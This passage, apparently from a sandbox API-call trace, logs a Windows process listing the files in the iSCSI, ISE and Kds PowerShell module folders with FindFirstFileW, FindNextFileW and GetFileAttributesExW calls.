ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 1 [0227.900] FindNextFileW (in: hFindFile=0x25b73cd11d0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.900] FindClose (in: hFindFile=0x25b73cd11d0 | out: hFindFile=0x25b73cd11d0) returned 1 [0227.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x653ef8cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0227.901] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d4d0 | out: lpFileInformation=0x653ef8d4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0227.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x653ef8cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0227.901] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi\\*"), lpFindFileData=0x653ef8d150 | out: lpFindFileData=0x653ef8d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1350 [0227.901] FindNextFileW (in: hFindFile=0x25b73cd1350, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.901] FindNextFileW (in: hFindFile=0x25b73cd1350, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI.psd1", cAlternateFileName="")) returned 1 [0227.902] FindNextFileW (in: hFindFile=0x25b73cd1350, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x185a, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSIConnection.cdxml", cAlternateFileName="")) returned 1 [0227.902] FindNextFileW (in: hFindFile=0x25b73cd1350, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSISession.cdxml", cAlternateFileName="")) returned 1 [0227.902] FindNextFileW (in: hFindFile=0x25b73cd1350, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a86, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITarget.cdxml", cAlternateFileName="")) returned 1 [0227.902] FindNextFileW (in: hFindFile=0x25b73cd1350, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 1 [0227.902] FindNextFileW (in: hFindFile=0x25b73cd1350, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 0 [0227.903] FindClose (in: hFindFile=0x25b73cd1350 | out: hFindFile=0x25b73cd1350) returned 1 [0227.903] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi\\iscsi.psd1")) returned 0x20 [0227.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0227.903] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1ef0 [0227.903] FindNextFileW (in: hFindFile=0x25b73cd1ef0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.904] FindNextFileW (in: hFindFile=0x25b73cd1ef0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1da, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psd1", cAlternateFileName="")) returned 1 [0227.904] FindNextFileW (in: hFindFile=0x25b73cd1ef0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 1 [0227.904] FindNextFileW (in: hFindFile=0x25b73cd1ef0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 0 [0227.904] FindClose (in: hFindFile=0x25b73cd1ef0 | out: hFindFile=0x25b73cd1ef0) returned 1 [0227.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0227.905] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd11d0 [0227.905] FindNextFileW (in: hFindFile=0x25b73cd11d0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.905] FindNextFileW (in: hFindFile=0x25b73cd11d0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1da, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psd1", cAlternateFileName="")) returned 1 [0227.905] FindNextFileW (in: hFindFile=0x25b73cd11d0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 1 [0227.905] FindNextFileW (in: hFindFile=0x25b73cd11d0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.906] FindClose (in: hFindFile=0x25b73cd11d0 | out: hFindFile=0x25b73cd11d0) returned 1 [0227.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x653ef8cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0227.906] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d4d0 | out: lpFileInformation=0x653ef8d4d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0227.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x653ef8cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0227.906] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise\\*"), lpFindFileData=0x653ef8d150 | out: lpFindFileData=0x653ef8d150*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1710 [0227.906] FindNextFileW (in: hFindFile=0x25b73cd1710, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.907] FindNextFileW (in: hFindFile=0x25b73cd1710, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1da, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psd1", cAlternateFileName="")) returned 1 [0227.907] FindNextFileW (in: hFindFile=0x25b73cd1710, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 1 [0227.907] FindNextFileW (in: hFindFile=0x25b73cd1710, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 0 [0227.907] FindClose (in: hFindFile=0x25b73cd1710 | out: hFindFile=0x25b73cd1710) returned 1 [0227.907] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise\\ise.psd1")) returned 0x20 [0227.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0227.908] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1b30 [0227.908] FindNextFileW (in: hFindFile=0x25b73cd1b30, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.908] FindNextFileW (in: hFindFile=0x25b73cd1b30, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0227.908] FindNextFileW (in: hFindFile=0x25b73cd1b30, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 1 [0227.908] FindNextFileW (in: hFindFile=0x25b73cd1b30, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 0 [0227.908] FindClose (in: hFindFile=0x25b73cd1b30 | out: hFindFile=0x25b73cd1b30) returned 1 [0227.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0227.909] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1cb0 [0227.909] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.909] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0227.910] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 1 [0227.910] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.910] FindClose (in: hFindFile=0x25b73cd1cb0 | out: hFindFile=0x25b73cd1cb0) returned 1 [0227.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", nBufferLength=0x105, lpBuffer=0x653ef8cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0227.910] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d4d0 | out: lpFileInformation=0x653ef8d4d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0227.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", nBufferLength=0x105, lpBuffer=0x653ef8cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0227.910] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds\\*"), 